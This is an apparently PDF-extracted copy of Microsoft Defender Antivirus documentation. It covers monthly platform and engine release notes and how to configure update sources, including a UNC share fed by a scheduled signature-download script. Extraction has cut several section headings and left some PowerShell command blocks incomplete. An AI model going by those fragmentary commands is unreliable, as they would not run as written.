Office macros, configured in warn mode where excluded files were incorrectly
blocked until the next device reboot
Known issues
None
July-2023 (Platform: 4.18.23070.1004 | Engine:

1.1.23070.1005)
Released: August 9, 2023 (Engine and Platform)
Platform: 4.18.23070.1004
Engine: 1.1.23070.1005
What's new
Improved output for Get-MpComputerStatus if scan results fail to retrieve
Extended management options for configuring security intelligence updates with
Intune, Group Policy, and PowerShell
Extended management options for disabling IOAV scans over the network using
Intune, Group Policy, and PowerShell. The new setting is
ApplyDisableNetworkScanningToIOAV for Set-MpPreference.
Improved the Unified agent installation process to handle MsMpEng.exe debugger

extensions, if present
Fixed an issue pertaining to showing the exclusions list with PowerShell Get-
MpPreference on systems managed by Intune
Fixed warn notifications for two attack surface reduction rules (Block Office
applications from injecting code into other processes and Block credential stealing
from the Windows local security authority subsystem)
Fixed an issue with running Update-MpSignature -UpdateSource:MMPC when using a
nonelevated PowerShell console (see Update-MpSignature)
Fixed an issue with ASR rules deployed via Intune to display accurately in the
Fixed tamper protection management for customers who have Microsoft 365 E3 or
Improved installation and uninstallation logic on Server SKUs using the modern,
unified agent (see Defender for Endpoint onboarding Windows Server)
Fixed an issue where AntivirusSignatureLastUpdated was incorrect when executing
Get-MpComputerStatus
Addressed a deadlock caused by Microsoft Defender Antivirus in rare cases
Added ProcessId to ASR Warn exclusion events (see ASR rules configuration
summary card)
Fixed an issue where values specified in ThreatSeverityDefaultAction weren't
honored intermittently
Improved error reporting in the modern, unified agent installer
Fixed the overriding logic in the ASR rule Block all Office applications from creating
child processes configured in warn mode
Added support for scanning Zstandard (Zstd) containers/archives
Known issues
None
May-2023 UPDATE (Platform: 4.18.23050.9)

Microsoft has released a platform update (4.18.23050.9) for the May 2023 release.

Released: July 24, 2023 (Platform only)
Platform: 4.18.23050.9
Engine: 1.1.23060.1005
What's new
Fixed a regression where HTTP requests were being handled sequentially, causing
high latency for network protection scenarios
Fixed a bug where DNS requests with empty authority records were being
improperly parsed
June-2023 (Engine: 1.1.23060.1005)

Released: July 10, 2023 (Engine only)
Engine: 1.1.23060.1005
What's new
Fixed an issue with ASR rules deployed via Intune to display accurately in the
Fixed a performance issue when building and validating the Microsoft Defender
Antivirus cache
Improved performance by removing redundant exclusion checks
Known Issues
See May-2023 UPDATE (Platform: 4.18.23050.9 | Engine: 1.1.23060.1005) for
platform updates.
May-2023 UPDATE (Platform: 4.18.23050.5 |
Engine: 1.1.23050.2)
Microsoft released a platform update (4.18.23050.5) for the May 2023 release, followed by
an additional update.

Platform: 4.18.23050.5
Engine: 1.1.23050.2
What's new
Fixed issue that could lead to resolution of incorrect service endpoint
Known Issues
Users encounter slow loading webpages in non-Microsoft web browsers with web
content filtering enabled
May-2023 (Platform: 4.18.23050.3 | Engine:

1.1.23050.2)
Platform: 4.18.23050.3
Engine: 1.1.23050.2
What's new
New version format for Platform and Engine (see the April-2023 update)
Improved processing of SmartLockerMode
Fixed input parameters for DefinitionUpdateChannel cmdlet in Set-MpPreference
Improved installation experience for Windows Server 2012 R2 and Windows Server
2016
Added ability to disable Defender task maintenance tasks programmatically
Fixed WDFilter 0x50 bug check
Fixed print enforcement issue for device control
Fixed scan randomization issue when setting Intune policy
Fixed sense offboarding on Windows Server 2016 when tamper protection is
enabled
Fixed inconsistent results of caching files with the internal Defender file cache
Augmented attack surface reduction telemetry with more data related to an ASR
detection
Removed Image File Execution Options (IFEO) debugger value during installation,
which can be used to prevent service starts
Fixed memory leaked in ASR logic
Improved validation guard-rail for Malicious Software Removal Tool (MSRT)
releases
Known Issues
Potential issue that could lead to resolution of incorrect service endpoint
April-2023 (Platform: 4.18.2304.8 | Engine:

1.1.20300.3)
Release date: May 2, 2023 (Engine) / May 2, 2023 (Platform)
Platform: 4.18.2304.8
Engine: 1.1.20300.3
What's new
Beginning in May 2023, the Platform and Engine version schema have a new
format. Here's what the new version format looks like:
Platform: 4.18.23050.1
Engine: 1.1.23050.63000
Fixed memory leak in behavior monitoring
Improved resiliency of signature loading and platform updates
Quarantine and restore support for WMI
Fixed attack surface reduction rule output with Get-MpPreference
Fixed MSERT to only use release engine version
Improved the enforcement of exclusions
Added support for enabling real-time protection and signature updates during
OOBE
Fixed localization for Defender events
Deprecated real-time signature delivery setting
Updated missing setting (ValidateMapsConnection) in MpCmdRun.exe
Fixed abandoned threats in the Windows Security app
Fixed a service-hang issue that caused invalid outputs to display in Get-
MpComputerStatus
Known issues
None
March-2023 (Platform: 4.18.2303.8 | Engine:

1.1.20200.4)
Release date: April 4, 2023 (Engine) / April 11, 2023 (Platform)
Platform: 4.18.2303.8
Engine: 1.1.20200.4
What's new
Beginning in April 2023, monthly platform and engine version release information
(in this article) now includes two dates: Engine and Platform
Increased file hash support
Added support to protect registry keys against parent keys abuse
Improved tamper protection of registry keys against parent keys abuse
Improved log handling for DLP and Device Control
Improved performance on developer drives
Known issues
None
February-2023 (Platform: 4.18.2302.7 | Engine:

1.1.20100.6)
Release date: March 27, 2023
Platform: 4.18.2302.7
Engine: 1.1.20100.6
What's new
Fixed attack surface reduction rule output with Get-MpPreference
Fixed threat DefaultAction outputs in Get-MpPreference
Improved Defender performance during file copy operations for .NET applications
Fixed Microsoft Defender Vulnerability Management app block warn feature
Added opt-in feature to allow users seeing exclusions
Fixed ASR warn policy
Increased maximum size for quarantine archive file to 4 GB
Improvements to threat remediation logic
Improved tamper protection hardening for temporary exclusions
Fixed time zone calculation in Defender PowerShell module
Fixed merging logic for exclusions in Defender PowerShell module
Improvements in the contextual exclusions syntax
Improved scheduled scan robustness
Improved serviceability for internal database files
Enhanced certificate indicators determination logic
Enhanced memory usage
Known Issues
None

1.1.20000.2)
Release date: February 14, 2023
Platform: 4.18.2301.6
Engine: 1.1.20000.2
What's new
Improved ASR rule processing logic
Updated Sense token hardening
Improved Defender CSP module update channel logic
Known Issues
None

1.1.19900.2)
Release date: December 8, 2022
Platform: 4.18.2211.5
Engine: 1.1.19900.2
What's new
Enhanced threat protection capabilities
Improved tamper protection capabilities
Enhanced enabling of tamper protection for newly onboarded devices
Improved reporting for cloud protection
Improved controlled folder access notifications
Improved scanning of network shares
Enhanced processing of host files containing a wild card
Improved performance for scan events
Known Issues
None

1.1.19800.4)
Release date: November 10, 2022
Platform: 4.18.2210.6
Engine: 1.1.19800.4
What's new
Addressed a quality issue that could result in poor responsiveness/usability
Improved hang detection in antivirus engine
Improved tamper protection capability
Changed threat & vulnerability management (TVM)-warn and TVM-block action to
block to resolve Intune's report
Removed Clean Action from Intune policy for ThreadSeverityDefaultAction
Added randomize scheduled task times configuration to Intune policy
Added manageability for DisableSMTPParsing network protection
Added improvement for behavior monitoring
Normalized date format for event 1151 for Windows Defender
Fixed a deadlock related to updating \device\cdrom* exclusions upon mounting a
cdrom drive under certain conditions
Improved PID information for threat detection
Known Issues
None

Engine: 1.1.19700.3)
Release date: October 10, 2022
Platform: 4.18.2209.7
Engine: 1.1.19700.3
What's new
Improved processing of Defender fallback order on Server SKU
Fixed Defender updates during OOBE process
Fixed Trusted Installer security descriptor vulnerability
Fixed Microsoft Defender Antivirus exclusions visibility
Fixed output of fallback order of the PowerShell cmdlet
Fixed Defender Platform update failure on Server Core 2019 SKUs
Improved hardening support for Defender disablement configurations on Server
SKUs
Improved Defender configuration logics for tamper protection on servers
Improved WARN mode for ASR rule
Improved certificate handling of OSX
Improved logging for scanning FilesStash location
on Windows Server 2012 R2 and later operating systems. Instead, it is either
ignored (if ForceDefenderPassiveMode is configured explicitly) or it places
Microsoft Defender Antivirus into passive mode (if ForceDefenderPassiveMode isn't
configured). Moreover, tamper protection allows a switch to active mode via
changing ForceDefenderPassiveMode to 0 , but not to passive mode. These changes
apply only to servers onboarded to Microsoft Defender for Endpoint. For more
information, please refer to Microsoft Defender Antivirus compatibility with other
security products
Known Issues
Some customers might have received platform updates 4.18.2209.2 from preview.
It can cause the service to get stuck at the start state after the update.
August-2022 (Platform: 4.18.2207.7 | Engine:

1.1.19600.3)
Release date: September 6, 2022
Platform: 4.18.2207.7
Engine: 1.1.19600.3
What's new
Starting with platform version 4.18.2207.7, the default behavior of dynamic
signature expiration reporting changes to reduce potential 2011 event notification
flooding. See: Event ID: 2011 in Review event logs and error codes to troubleshoot
issues with Microsoft Defender Antivirus
Fixed Unified agent installer issues on WS2012R2 Server and Windows Server 2016
Fixed remediation issue for custom detection
Fixed Race condition related to behavior monitoring
Resolved multiple deadlock scenarios in Defender dlls
Improved frequency of Windows toasts notification for ASR rules
Known Issues
None

1.1.19500.2)
Release date: August 15, 2022
Platform: 4.18.2207.5
Engine: 1.1.19500.2
What's new
Performance improvement for hybrid sleep delay when Microsoft Defender
Antivirus is active
Fixed client detection behavior related to custom certificate blocking indicators of
compromise
Performance improvement for AntiMalware Scan Interface (AMSI) caching
Improved detection and remediation for Microsoft Visual Basic for Applications
(VBA) related macros
Improved processing of AMSI exclusions
Fixed deadlock detection in Host Intrusion Prevention System (HIPS) rule
processing. (For more information about HIPS and Defender for Endpoint, see
Migrating from a third-party HIPS to ASR rules.)
Fixed memory leak where MsMpEng.exe was consuming private bytes. (If high CPU
usage is also an issue, see High CPU usage due to Microsoft Defender Antivirus)
Fixed deadlock with behavior monitoring
Improved trust validation
Fixed engine crash issue on legacy operating platforms
Performance Analyzer v3 updates: Added top path support, scan skip information,
and OnDemand scan support. See Performance analyzer for Microsoft Defender
Antivirus.
Defender performance improvements during file copy operations
Added improvements for troubleshooting mode
Added fix for Defender WINEVT channels across update/restarts. (For more
information about WINEVT, see Windows Event Log.)
Added fix for Defender WMI management bug during startup/updates
Added fix for duplicated 2010/2011 in the Windows Event Viewer Operational
events
Added support for Defender for Endpoint stack processes token hardening
Known Issues
Customers deploying platform update 4.18.2207.5 might experience lagging
network performance that could impact applications.

1.1.19300.2)
Platform: 4.18.2205.7
Engine: 1.1.19300.2
What's new
Added fix for ETW channel configuration for updates
Added support for contextual exclusions allowing more specific exclusion targeting
Fixed context maximum size
Added fix for ASR LSASS detection
Added fix to SHSetKnownFolder for rule exclusion logic
Added AMSI disk usage limits for The History Store
Added fix for Defender service refusing to accept signature updates
Known issues
None
March-2022 UPDATE (Platform: 4.18.2203.5 |
Engine: 1.1.19200.5)
Customers who applied the March 2022 Microsoft Defender engine update (1.1.19100.5)
might have encountered high resource utilization (CPU and/or memory). Microsoft has
released an update (1.1.19200.5) that resolves the bugs introduced in the earlier version.
Customers are recommended to update to at least this new engine build of Antivirus
Engine (1.1.19200.5). To ensure any performance issues are fully fixed, it's recommended to
reboot machines after applying update.

Released: April 22, 2022
Platform: 4.18.2203.5
Engine: 1.1.19200.5
What's new
Resolves issues with high resource utilization (CPU and/or memory) related to the
earlier March 2022 Microsoft Defender engine update (1.1.19100.5)
Known issues
None

1.1.19100.5)
Platform: 4.18.2203.5
Engine: 1.1.19100.5
What's new
Added fix for an attack surface reduction rule that blocked an Outlook add-in
Added fix for behavior monitoring performance issue related to short live
processes
Added fix for AMSI exclusion
Improved tamper protection capabilities
Added a fix for real-time protection getting disabled in some cases when using
SharedSignaturesPath config. For more information about the
SharedSignaturesPath parameter, see Set-MpPreference.
Known issues
Potential for high resource utilization (CPU and/or memory). See the Platform
4.18.2203.5 and Engine 1.1.19200.5 update for March 2022.

1.1.19000.8)
Released: March 14, 2022
Platform: 4.18.2202.4
Engine: 1.1.19000.8
What's new
Improvements to detection and behavior monitoring logic
Fixed false positive triggering attack surface reduction detections
Added fix resulting in better fidelity of EDR and Advanced Hunting detection alerts
Defender no longer supports custom notifications on toast pop ups. Modified
GPO/Intune/SCCM and docs to reflect this change.
Improvements to capture both information and copy of files written to removable
storage.
Improved traffic output when SmartScreen service is unreachable
Connectivity improvements for customers using proxies with authentication
requirements
Fixed VDI device update bug for network FileShares
EDR in block mode now supports granular device targeting with new CSPs. See
Endpoint detection and response (EDR) in block mode.
Known issues
None
1.1.18900.2)
Released: February 9, 2022
Platform: 4.18.2201.10
Engine: 1.1.18900.2
What's new
Behavior monitoring improvements in filtering performance
Hardening to TrustedInstaller
Tamper protection improvements
Replaced ScanScheduleTime with new ScanScheduleOffest cmdlet in Set-
MpPreference. This policy configures the number of minutes after midnight to
perform a scheduled scan.
Added the -ServiceHealthReportInterval setting to Set-MpPreference. This policy
configures the time interval (in minutes) to perform a scheduled scan.
Added the AllowSwitchToAsyncInspection setting to Set-MpPreference. This policy
enables a performance optimization that allows synchronously inspected network
flows to switch to async inspection once they've been checked and validated.
Performance Analyzer v2 updates: Remote PowerShell and PowerShell 7.x support
added. See Performance analyzer for Microsoft Defender Antivirus.
Fixed potential duplicate packet bug in Microsoft Defender Antivirus network
inspection system driver.
Known issues
None

1.1.18800.4)
Released: December 9th, 2021
Platform: 4.18.2111.5
Engine: 1.1.18800.4
What's new
Improved CPU usage efficiency of certain intensive scenarios on Exchange servers
Added new device control status fields under Get-MpComputerStatus in Defender
PowerShell module.
Fixed bug in which SharedSignatureRoot value couldn't be removed when set with
PowerShell
Fixed bug in which tamper protection failed to be enabled, even though Microsoft
Defender for Endpoint indicated that tamper protection was turned on
Added supportability and bug fixes to performance analyzer for Microsoft
Defender Antivirus tool. For more information, see Performance analyzer for
PowerShell ISE support added for New-MpPerformanceRecording
Fixed bug errors for Get-MpPerformanceReport -TopFilesPerProcess
Fixed performance recording session leak when using New-
MpPerformanceRecording in PowerShell 7.x, remote sessions, and PowerShell ISE
Known issues
None

1.1.18700.4)
Released: October 28th, 2021
Platform: 4.18.2110.6
Engine: 1.1.18700.4
What's new
Improvements to file transfer protocol (FTP) network traffic coverage
Fix to reduce Microsoft Defender CPU usage in Exchange Server running on
Windows Server 2016
Fix for scan interruptions
Fix for alerts on blocked tampering attempts not appearing in Security Center
Improvements to tamper resilience in Microsoft Defender service
Known issues
None
September-2021 (Platform: 4.18.2109.6 | Engine:

1.1.18600.4)
Released: October 7th, 2021
Platform: 4.18.2109.6
Engine: 1.1.18600.4
What's new
New delay ring for Microsoft Defender Antivirus engine and platform updates.
Devices that opt into this ring receives updates with a 48-hour delay. The new
delay ring is suggested for critical environments only. See Manage the gradual
rollout process for Microsoft Defender updates.
Improvements to Microsoft Defender update gradual rollout process
Known issues
None

1.1.18500.10)
Released: September 2, 2021
Platform: 4.18.2108.7
Engine: 1.1.18500.10
What's new
Improvements to the behavior monitoring engine
Released new performance analyzer for Microsoft Defender Antivirus
Microsoft Defender Antivirus hardened against loading malicious DLLs
Microsoft Defender Antivirus hardened against the TrustedInstaller bypass
Extending file change notifications to include more data for Human-Operated
Ransomware (HumOR)
Known issues
None

1.1.18400.4)
Platform: 4.18.2107.4
Engine: 1.1.18400.4
What's new
Device control support added for Windows Portable Devices
Potentially unwanted applications (PUA) protection is turned on by default for
consumers (See Block potentially unwanted applications with Microsoft Defender
Antivirus.)
Scheduled scans for Group Policy Object managed systems adhere to user
configured scan time
Improvements to the behavior monitoring engine
Known issues
None
June-2021 (Platform: 4.18.2106.5 | Engine:

1.1.18300.4)
Platform: 4.18.2106.5
Engine: 1.1.18300.4
What's new
New controls for managing the gradual rollout process of Microsoft Defender
updates. See Manage the gradual rollout process for Microsoft Defender updates.
Improvement to the behavior monitoring engine
Improvements to the rollout of antimalware definitions
Extended Microsoft Edge network event inspections
Known issues
None

1.1.18200.4)
Platform: 4.18.2105.4
Engine: 1.1.18200.4
What's new
Improvements to behavior monitoring
Fixed network protection notification filtering feature
Known issues
None

1.1.18100.5)
Released: April 26, 2021 (Engine: 1.1.18100.6 released May 5, 2021)
Platform: 4.18.2104.14
Engine: 1.1.18100.5
What's new
More behavior monitoring logic
Improved kernel mode key logger detection
Added new controls to manage the gradual rollout process for Microsoft Defender
updates
Known issues
None

1.1.18000.5)
Platform: 4.18.2103.7
Engine: 1.1.18000.5
What's new
Improvement to the Behavior Monitoring engine
Expanded network brute-force-attack mitigations
More failed tampering attempt event generation when Tamper Protection is
enabled
Known issues
None

1.1.17900.7)
Platform: 4.18.2102.3
Engine: 1.1.17900.7
What's new
Improved service recovery through tamper protection
Extend tamper protection scope
Known issues
None

1.1.17800.5)
Platform: 4.18.2101.9
Engine: 1.1.17800.5
What's new
Shellcode exploit detection improvements
Increased visibility for credential stealing attempts
Improvements in antitampering features in Microsoft Defender Antivirus services
Improved support for ARM x64 emulation
Fix: EDR Block notification remains in threat history after real-time protection
performed initial detection
Known issues
None

1.1.17700.4)
Released: December 03, 2020
Platform: 4.18.2011.6
Engine: 1.1.17700.4
What's new
Improved SmartScreen status support logging
Known issues
None

1.1.17600.5)
Released: October 29, 2020
Platform: 4.18.2010.7
Engine: 1.1.17600.5
What's new
New descriptions for special threat categories
Improved emulation capabilities
Improved host address allow/block capabilities
New option in Defender CSP to Ignore merging of local user exclusions
Known issues
None

Engine: 1.1.17500.4)
Released: October 01, 2020
Platform: 4.18.2009.7
Engine: 1.1.17500.4
What's new
Admin permissions are required to restore files in quarantine
XML formatted events are now supported
CSP support for ignoring exclusion merges
New management interfaces for:
UDP Inspection
Network Protection on Server 2019
IP Address exclusions for Network Protection
Improved visibility into TPM measurements
Improved Office VBA module scanning
Known issues
None

1.1.17400.5)
Platform: 4.18.2008.9
Engine: 1.1.17400.5
What's new
Add more telemetry events
Improved scan event telemetry
Improved behavior monitoring for memory scans
Improved macro streams scanning
Added AMRunningMode to Get-MpComputerStatus PowerShell cmdlet
DisableAntiSpyware is ignored. Microsoft Defender Antivirus automatically turns
itself off when it detects another antivirus program.
Known issues
None
1.1.17300.4)
Released: July 28, 2020
Platform: 4.18.2007.8
Engine: 1.1.17300.4
What's new
Improved telemetry for BITS
Improved Authenticode code signing certificate validation
Known issues
None
June-2020 (Platform: 4.18.2006.10 | Engine:

1.1.17200.2)
Platform: 4.18.2006.10
Engine: 1.1.17200.2
What's new
Possibility to specify the location of the support logs
Skipping aggressive catchup scan in Passive mode.
Allow Defender to update on metered connections
Fixed performance tuning when caching is disabled
Fixed registry query
Fixed scantime randomization in ADMX
Known issues
None
1.1.17100.2)
Platform: 4.18.2005.4
Engine: 1.1.17100.2
What's new
Improved logging for scan events
Improved user mode crash handling.
Added event tracing for Tamper protection
Fixed AMSI Sample submission
Fixed AMSI Cloud blocking
Fixed Security update install log
Known issues
None

1.1.17000.2)
Platform: 4.18.2004.6
Engine: 1.1.17000.2
What's new
WDfilter improvements
Add more actionable event data to attack surface reduction detection events
Fixed version information in diagnostic data and WMI
Fixed incorrect platform version in UI after platform update
Dynamic URL intel for Fileless threat protection
UEFI scan capability
Extend logging for updates
Known issues
None

1.1.16900.2)
Platform: 4.18.2003.8
Engine: 1.1.16900.4
What's new
CPU Throttling option added to MpCmdRun
Improve diagnostic capability
reduce Security intelligence timeout (5 min)
Extend AMSI engine internal log capability
Improve notification for process blocking
Known issues
[Fixed] Microsoft Defender Antivirus is skipping files when running a scan.
February-2020 (Platform: - | Engine: 1.1.16800.2)

Platform/Client: -
Engine: 1.1.16800.2
What's new
None
Known issues
None

1.1.16700.2)
Released: January 30, 2020
Platform/Client: 4.18.2001.10
Engine: 1.1.16700.2
What's new
Fixed BSOD on WS2016 with Exchange
Support platform updates when TMP is redirected to network path
Platform and engine versions are added to WDSI
extend Emergency signature update to passive mode
Fix 4.18.1911.3 hang
Known issues
[Fixed] devices utilizing modern standby mode may experience a hang with the
Windows Defender filter driver that results in a gap of protection. Affected
machines appear to the customer as having not updated to the latest antimalware
platform.
） Important
This update is:
needed by RS1 devices running lower version of the platform to support

SHA2;
has a reboot flag for systems that have hanging issues;
is re-released in April 2020 and will not be superseded by newer updates to
keep future availability;
is categorized as an update due to the reboot requirement; and
is only be offered with Windows Update .
1.1.16600.7)
Released: December 7, 2019
Platform: 4.18.1911.3
Engine: 1.1.17000.7
Support phase: No support
What's new
Fixed MpCmdRun tracing level
Fixed WDFilter version info
Improve notifications (PUA)
add MRT logs to support files
Known issues
When this update is installed, the device needs the jump package 4.18.2001.10 to
be able to update to the latest platform version.
 Tip
Feedback

Manage the sources for Microsoft
Defender Antivirus protection updates
Article • 08/28/2023
Applies to:

Platforms
Windows
Keeping your antivirus protection up to date is critical. There are two components to
managing protection updates for Microsoft Defender Antivirus:
Where the updates are downloaded from; and

When updates are downloaded and applied.
This article describes how to specify from where updates should be downloaded (this
specification is also known as the fallback order). See Manage Microsoft Defender
Antivirus updates and apply baselines article for an overview on how updates work, and
how to configure other aspects of updates (such as scheduling updates).
） Important
Microsoft Defender Antivirus Security intelligence updates and platform updates

are delivered through Windows Update and starting Monday, October 21, 2019, all
security intelligence updates are SHA-2 signed exclusively. Your devices must be
updated to support SHA-2 in order to update your security intelligence. To learn
more, see 2019 SHA-2 Code Signing Support requirement for Windows and
WSUS .
Fallback order
Typically, you configure endpoints to individually download updates from a primary
source followed by other sources in order of priority, based on your network
configuration. Updates are obtained from sources in the order you specify. If updates
from the current source are out-of-date, the next source in the list is used immediately.
When updates are published, some logic is applied to minimize the size of the update.
In most cases, only the differences between the latest update and the update that is
currently installed (the set of differences is referred to as the delta) on the device is
downloaded and applied. However, the size of the delta depends on two main factors:
The age of the last update on the device; and

The source used to download and apply updates.
The older the updates on an endpoint, the larger the download is. However, you must
also consider download frequency as well. A more frequent update schedule can result
in more network usage, whereas a less-frequent schedule can result in larger file sizes
per download.
There are five locations where you can specify where an endpoint should obtain
updates:
Microsoft Update
Windows Server Update Service (See note 1 below)
Network file share
Security intelligence updates for Microsoft Defender Antivirus and other Microsoft
anti-malware (See note 2 below)
７ Note
1. Intune Internal Definition Update Server. If you use SCCM/SUP to get

definition updates for Microsoft Defender Antivirus, and you must access
Windows Update on blocked client devices, you can transition to co-
management and offload the endpoint protection workload to Intune. In the
antimalware policy configured in Intune there is an "internal definition update
server" option that you can set to use on-premises WSUS as the update
source. This configuration helps you control which updates from the official
WU server are approved for the enterprise, and also helps proxy and save
network traffic to the official Windows Updates network.
2. Your policy and registry might have this listed as Microsoft Malware
Protection Center (MMPC) security intelligence, its former name.
To ensure the best level of protection, Microsoft Update allows for rapid releases, which
means smaller downloads on a frequent basis. The Windows Server Update Service,
Microsoft Endpoint Configuration Manager, Microsoft security intelligence updates, and
platform updates sources deliver less frequent updates. Thus, the delta might be larger,
resulting in larger downloads.
Platform updates contain engine updates and are released on a monthly cadence.
Security intelligence updates are also delivered multiple times a day, but this package
doesn't contain an engine. See Microsoft Defender Antivirus security intelligence and
product updates.
） Important
If you have set Microsoft Security intelligence page updates as a fallback source
after Windows Server Update Service or Microsoft Update, updates are only
downloaded from security intelligence updates and platform updates when the
current update is considered out-of-date. (By default, this is seven consecutive days
of not being able to apply updates from the Windows Server Update Service or
Microsoft Update services). You can, however, set the number of days before
protection is reported as out-of-date.
Starting Monday, October 21, 2019, security intelligence updates and platform
updates are SHA-2 signed exclusively. Devices must be updated to support SHA-2
in order to get the latest security intelligence updates and platform updates. To
learn more, see 2019 SHA-2 Code Signing Support requirement for Windows and
WSUS .
Each source has typical scenarios that depend on how your network is configured, in
addition to how often they publish updates, as described in the following table:
ﾉ Expand table
Location Sample scenario
Windows Server Update Service You're using Windows Server Update Service to manage
updates for your network.
Microsoft Update You want your endpoints to connect directly to Microsoft

Update. This option is useful for endpoints that irregularly
connect to your enterprise network, or if you don't use
Windows Server Update Service to manage your updates.
File share You have non-Internet-connected devices (such as VMs). You

can use your Internet-connected VM host to download the
updates to a network share, from which the VMs can obtain
the updates. See the VDI deployment guide for how file shares
are used in virtual desktop infrastructure (VDI) environments.
Location Sample scenario
Microsoft Configuration You're using Microsoft Configuration Manager to update your

Manager endpoints.
Security intelligence updates Make sure your devices are updated to support SHA-2 .
and platform updates for Microsoft Defender Antivirus Security intelligence and
Microsoft Defender Antivirus platform updates are delivered through Windows Update, and
and other Microsoft anti- starting Monday October 21, 2019 security intelligence
malware (formerly referred to as updates and platform updates are SHA-2 signed exclusively.
MMPC) Download the latest protection updates because of a recent
infection or to help provision a strong, base image for VDI
deployment. This option should generally be used only as a
final fallback source, and not the primary source. It's only be
used if updates can't be downloaded from Windows Server
Update Service or Microsoft Update for a specified number of
days.
You can manage the order in which update sources are used with Group Policy,
Microsoft Endpoint Configuration Manager, PowerShell cmdlets, and WMI.
） Important
If you set Windows Server Update Service as a download location, you must
approve the updates, regardless of the management tool you use to specify the
location. You can set up an automatic approval rule with Windows Server Update
Service, which might be useful as updates arrive at least once a day. To learn more,
see synchronize endpoint protection updates in standalone Windows Server
Update Service.
The procedures in this article first describe how to set the order, and then how to set up
the File share option if you have enabled it.
Use Group Policy to manage the update

location
Console, right-click the Group Policy Object you want to configure and then select
Edit.
3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Windows Defender > Signature
updates and then configure the following settings:
a. Edit the Define the order of sources for downloading security intelligence
updates setting. Set the option to Enabled.
b. Specify the order of sources, separated by a single pipe, for example:

InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC , as shown in the
following screenshot.
c. Select OK. This action sets the order of protection update sources.
d. Edit the Define file shares for downloading security intelligence updates
setting and then set the option to Enabled.
e. Specify the file share source. If you have multiple sources, specify each source in
the order they should be used, separated by a single pipe. Use standard UNC
notation for denoting the path, for example: \\host-name1\share-name\object-
name|\\host-name2\share-name\object-name . If you don't enter any paths, then
this source is skipped when the VM downloads updates.

f. Select OK. This action sets the order of file shares when that source is
referenced in the Define the order of sources... group policy setting.
７ Note
For Windows 10, versions 1703 up to and including 1809, the policy path is
Windows Components > Microsoft Defender Antivirus > Signature Updates For
Windows 10, version 1903, the policy path is Windows Components > Microsoft
Defender Antivirus > Security Intelligence Updates
Use Configuration Manager to manage the

update location
See Configure Security intelligence Updates for Endpoint Protection for details on
configuring Microsoft Configuration Manager (current branch).
Use PowerShell cmdlets to manage the update

location
Use the following PowerShell cmdlets to set the update order.
PowerShell
Set-MpPreference -SignatureFallbackOrder
{LOCATION|LOCATION|LOCATION|LOCATION}
Set-MpPreference -SignatureDefinitionUpdateFileSharesSource {\\UNC SHARE
PATH|\\UNC SHARE PATH}
See the following articles for more information:
Set-MpPreference -SignatureFallbackOrder
Set-MpPreference -SignatureDefinitionUpdateFileSharesSource
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus
Defender Antivirus cmdlets

to manage the update location
WMI
SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSource
See the following articles for more information:
Windows Defender WMIv2 APIs
Use Mobile Device Management (MDM) to

manage the update location
See Policy CSP - Defender/SignatureUpdateFallbackOrder for details on configuring
MDM.
What if we're using a third-party vendor?

This article describes how to configure and manage updates for Microsoft Defender
Antivirus. However, you can hire third-party vendors to perform these tasks.
For example, suppose that Contoso has hired Fabrikam to manage their security
solution, which includes Microsoft Defender Antivirus. Fabrikam typically uses Windows
Management Instrumentation, PowerShell cmdlets, or Windows command-line to
deploy patches and updates.
７ Note
Microsoft does not test third-party solutions for managing Microsoft Defender
Antivirus.
Create a UNC share for security intelligence

and platform updates
Set up a network file share (UNC/mapped drive) to download security intelligence and
platform updates from the MMPC site by using a scheduled task.
1. On the system for which you want to provision the share and download the
updates, create a folder for the script.
Console
Start, CMD (Run as admin)
MD C:\Tool\PS-Scripts\
2. Create a folder for signature updates.
Console
MD C:\Temp\TempSigs\x64
3. Download the PowerShell script from

www.powershellgallery.com/packages/SignatureDownloadCustomTask/1.4 .
4. Select Manual Download.
5. Select Download the raw nupkg file.
6. Extract the file.
7. Copy the file SignatureDownloadCustomTask.ps1 to the folder you previously

created, C:\Tool\PS-Scripts\ .
8. Use the command line to set up the scheduled task.
７ Note
There are two types of updates: full and delta.
For x64 delta:
PowerShell
Powershell (Run as admin)
C:\Tool\PS-Scripts\
".\SignatureDownloadCustomTask.ps1 -action create -arch x64 -

isDelta $true -destDir C:\Temp\TempSigs\x64 -scriptPath
C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval
1"
For x64 full:
PowerShell
C:\Tool\PS-Scripts\

isDelta $false -destDir C:\Temp\TempSigs\x64 -scriptPath
1"
For x86 delta:
PowerShell
C:\Tool\PS-Scripts\

1"
For x86 full:
PowerShell
C:\Tool\PS-Scripts\

1"
７ Note
When the scheduled tasks are created, you can find these in the Task
Scheduler under Microsoft\Windows\Windows Defender .
9. Run each task manually and verify that you have data ( mpam-d.exe , mpam-fe.exe ,
and nis_full.exe ) in the following folders (you might have chosen different
locations):
C:\Temp\TempSigs\x86
If the scheduled task fails, run the following commands:
Console
C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -
executionpolicy allsigned -command "&\"C:\Tool\PS-
Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -
isDelta $False -destDir C:\Temp\TempSigs\x64"
isDelta $True -destDir C:\Temp\TempSigs\x64"
10. Create a share pointing to C:\Temp\TempSigs (for example, \\server\updates ).
７ Note
At a minimum, authenticated users must have "Read" access. This requirement

also applies to domain computers, the share, and NTFS (security).
11. Set the share location in the policy to the share.
７ Note
Do not add the x64 (or x86) folder in the path. The mpcmdrun.exe process
adds it automatically.
Related articles
Manage Microsoft Defender Antivirus updates and apply baselines
Manage updates for endpoints that are out of date
Manage event-based forced updates
Manage updates for mobile devices and VMs
 Tip
Feedback

Manage the schedule for when
protection updates should be
downloaded and applied
Article • 03/15/2023
） Important
Customers who applied the March 2022 Microsoft Defender engine update
(1.1.19100.5) might have encountered high resource utilization (CPU and/or
memory). Microsoft has released an update (1.1.19200.5) that resolves the bugs
introduced in the earlier version. Customers are recommended to update to this
new engine build of Antivirus Engine (1.1.19200.5). To ensure any performance
issues are fully fixed, it is recommended to reboot machines after applying update.
For more information, see Monthly platform and engine versions.
Applies to:

Platforms
Windows
Microsoft Defender Antivirus lets you determine when it should look for and download
updates.
You can schedule updates for your endpoints by:
Specifying the day of the week to check for protection updates

Specifying the interval to check for protection updates
Specifying the time to check for protection updates
You can also randomize the times when each endpoint checks and downloads
